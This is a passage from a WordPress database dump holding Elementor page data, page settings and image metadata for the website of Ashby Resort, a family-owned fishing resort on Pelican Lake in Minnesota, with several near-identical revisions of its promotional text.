lider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dec8e69\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c060f23\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"97656fc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1930,12,'_elementor_edit_mode','builder'),(1931,12,'_elementor_template_type','wp-post'),(1932,12,'_elementor_version','2.9.8'),(1934,12,'_elementor_data','[{\"id\":\"2dc9fcd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f475f02\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1c5c7f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"aeae2a8\"}]},\"elements\":[{\"id\":\"6a08dc2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a93c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9709d19\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"71dc072\"}]},\"elements\":[{\"id\":\"1a258be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>IF YOUR LOOKING FOR A VACATION DREAM<br \\/>WE HAVE YOUR DREAM VACATION<\\/strong><\\/p><p>Relax, Unwind and enjoy the sunsets !!<\\/p><p>Ashby Resort is located in Grant County, Minnesota on beautiful Pelican Lake.The lake is approx. 4,000 acres. We are just off highway 94 midway between Alexandria and Fergus Falls.<br \\/>Ashby Resort is a family owned fishing resort. Owner, Dean Beneke, is here to help you enjoy a timeless Minnesota fishing tradition.<br \\/>Approximately 80% of our customer\'s return to the resort each year and many have done it for several generations.<br \\/>The Resort is nestled on 10 acres of land on the north side of the lake and has something for everyone. The ultimate location for your family\'s reunion. We have five Cabins, seven Motel rooms both with and without Kitchens and a newly remodeled 2 bedroom lakeside villa. There are also 16 lakeside\\/view campsites for your camper or tent.<\\/p><p>Gently sloping sandy beach\\/swim area<\\/p><p>WIFI AVAILABLE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1935,758,'_wp_page_template','default'),(1936,758,'_elementor_edit_mode','builder'),(1937,758,'_elementor_template_type','post'),(1938,758,'_elementor_version','2.5.12'),(1939,758,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1940,758,'_elementor_data','[{\"id\":\"2dc9fcd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f475f02\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1c5c7f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"aeae2a8\"}]},\"elements\":[{\"id\":\"6a08dc2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a93c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9709d19\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"71dc072\"}]},\"elements\":[{\"id\":\"1a258be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>IF YOUR LOOKING FOR A VACATION DREAM<br \\/>WE HAVE YOUR DREAM VACATION<\\/strong><\\/p><p>Relax, Unwind and enjoy the sunsets !!<\\/p><p>Ashby Resort is located in Grant County, Minnesota on beautiful Pelican Lake.The lake is approx. 4,000 acres. We are just off highway 94 midway between Alexandria and Fergus Falls.<br \\/>Ashby Resort is a family owned fishing resort. Owner, Dean Beneke, is here to help you enjoy a timeless Minnesota fishing tradition.<br \\/>Approximately 80% of our customer\'s return to the resort each year and many have done it for several generations.<br \\/>The Resort is nestled on 10 acres of land on the north side of the lake and has something for everyone. The ultimate location for your family\'s reunion. We have five Cabins, seven Motel rooms both with and without Kitchens and a newly remodeled 2 bedroom lakeside villa. There are also 16 lakeside\\/view campsites for your camper or tent.<\\/p><p>Gently sloping sandy beach\\/swim area<\\/p><p>FREE WIFI<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1943,759,'_wp_page_template','default'),(1944,759,'_elementor_edit_mode','builder'),(1945,759,'_elementor_template_type','post'),(1946,759,'_elementor_version','2.5.12'),(1947,759,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1948,759,'_elementor_data','[{\"id\":\"2dc9fcd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f475f02\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1c5c7f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"aeae2a8\"}]},\"elements\":[{\"id\":\"6a08dc2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a93c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9709d19\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"71dc072\"}]},\"elements\":[{\"id\":\"1a258be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>IF YOUR LOOKING FOR A VACATION DREAM<br \\/>WE HAVE YOUR DREAM VACATION<\\/strong><\\/p><p>Relax, Unwind and enjoy the sunsets !!<\\/p><p>Ashby Resort is located in Grant County, Minnesota on beautiful Pelican Lake.The lake is approx. 4,000 acres. We are just off highway 94 midway between Alexandria and Fergus Falls.<br \\/>Ashby Resort is a family owned fishing resort. Owner, Dean Beneke, is here to help you enjoy a timeless Minnesota fishing tradition.<br \\/>Approximately 80% of our customer\'s return to the resort each year and many have done it for several generations.<br \\/>The Resort is nestled on 10 acres of land on the north side of the lake and has something for everyone. The ultimate location for your family\'s reunion. We have five Cabins, seven Motel rooms both with and without Kitchens and a newly remodeled 2 bedroom lakeside villa. There are also 16 lakeside\\/view campsites for your camper or tent.<\\/p><p>Gently sloping sandy beach\\/swim area<\\/p><p>FREE WIFI\\u00a0 \\u00a0test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1951,760,'_wp_page_template','default'),(1952,760,'_elementor_edit_mode','builder'),(1953,760,'_elementor_template_type','post'),(1954,760,'_elementor_version','2.5.12'),(1955,760,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1956,760,'_elementor_data','[{\"id\":\"2dc9fcd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f475f02\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1c5c7f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"aeae2a8\"}]},\"elements\":[{\"id\":\"6a08dc2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a93c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9709d19\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"71dc072\"}]},\"elements\":[{\"id\":\"1a258be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>IF YOUR LOOKING FOR A VACATION DREAM<br \\/>WE HAVE YOUR DREAM VACATION<\\/strong><\\/p><p>Relax, Unwind and enjoy the sunsets !!<\\/p><p>Ashby Resort is located in Grant County, Minnesota on beautiful Pelican Lake.The lake is approx. 4,000 acres. We are just off highway 94 midway between Alexandria and Fergus Falls.<br \\/>Ashby Resort is a family owned fishing resort. Owner, Dean Beneke, is here to help you enjoy a timeless Minnesota fishing tradition.<br \\/>Approximately 80% of our customer\'s return to the resort each year and many have done it for several generations.<br \\/>The Resort is nestled on 10 acres of land on the north side of the lake and has something for everyone. The ultimate location for your family\'s reunion. We have five Cabins, seven Motel rooms both with and without Kitchens and a newly remodeled 2 bedroom lakeside villa. There are also 16 lakeside\\/view campsites for your camper or tent.<\\/p><p>Gently sloping sandy beach\\/swim area<\\/p><p>FREE WIFI\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1958,40,'_elementor_edit_mode','builder'),(1959,40,'_elementor_template_type','post'),(1960,40,'_elementor_version','2.5.16'),(1965,40,'vantage_panels_no_legacy','true'),(1968,761,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.01.55-PM.png'),(1969,761,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:225;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.01.55-PM.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.01.55-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.01.55-PM-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.01.55-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.01.55-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1970,762,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.03.24-PM.png'),(1971,762,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:299;s:6:\"height\";i:223;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.03.24-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.03.24-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.03.24-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.03.24-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1972,763,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.03.35-PM.png'),(1973,763,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:298;s:6:\"height\";i:225;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.03.35-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.03.35-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.03.35-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.03.35-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1974,764,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.02.06-PM.png'),(1975,764,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:299;s:6:\"height\";i:223;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.02.06-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.02.06-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.02.06-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.02.06-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1976,765,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.02.16-PM.png'),(1977,765,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:296;s:6:\"height\";i:224;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.02.16-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.02.16-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.02.16-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.02.16-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1980,767,'_wp_attached_file','2019/04/Screen-Shot-2019-04-09-at-8.02.27-PM.png'),(1981,767,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:298;s:6:\"height\";i:225;s:4:\"file\";s:48:\"2019/04/Screen-Shot-2019-04-09-at-8.02.27-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.02.27-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.02.27-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:48:\"Screen-Shot-2019-04-09-at-8.02.27-PM-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1983,40,'_elementor_data','[{\"id\":\"fc76464\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5536551\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"56364c2\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f341f9e\"}]},\"elements\":[{\"id\":\"5e4caa1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0e293a0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e9d5e63\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"82ea2cc\"}]},\"elements\":[{\"id\":\"7e61b47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.03.24-PM.png\",\"id\":762}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2d498c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7b344a2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"049de3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e9a8e52\"}]},\"elements\":[{\"id\":\"69d7ea9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.03.35-PM.png\",\"id\":763}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f216db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2f3dfb8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ceb6001\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13dae5e\"}]},\"elements\":[{\"id\":\"fb96a86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.01.55-PM.png\",\"id\":761}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2759c31\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d872028\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"33c9c25\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7c31972\"}]},\"elements\":[{\"id\":\"8b3f141\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d74147d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94515cc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e85e195\"}]},\"elements\":[{\"id\":\"5025a8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.06-PM.png\",\"id\":764}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b140f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a7fed3b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"193cbaa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4befc1e\"}]},\"elements\":[{\"id\":\"f317653\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.16-PM.png\",\"id\":765}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1ce41e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c556852\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5afa19a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4420cb\"}]},\"elements\":[{\"id\":\"adc26b8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.27-PM.png\",\"id\":767}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27fb6f7\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"68e5b19\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fdb7463\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5413439\"}]},\"elements\":[{\"id\":\"d959af0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bfaafa8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2e22536\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8fe5ec3\"}]},\"elements\":[{\"id\":\"fcf0d1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>To make your stay more fun, we have paddle boards, a paddle boat, kayaks, canoes available for use by our guests, NO charge !!<\\/p><p>Fishing boats and pontoon to rent by the day or week.<\\/p><p>The fish 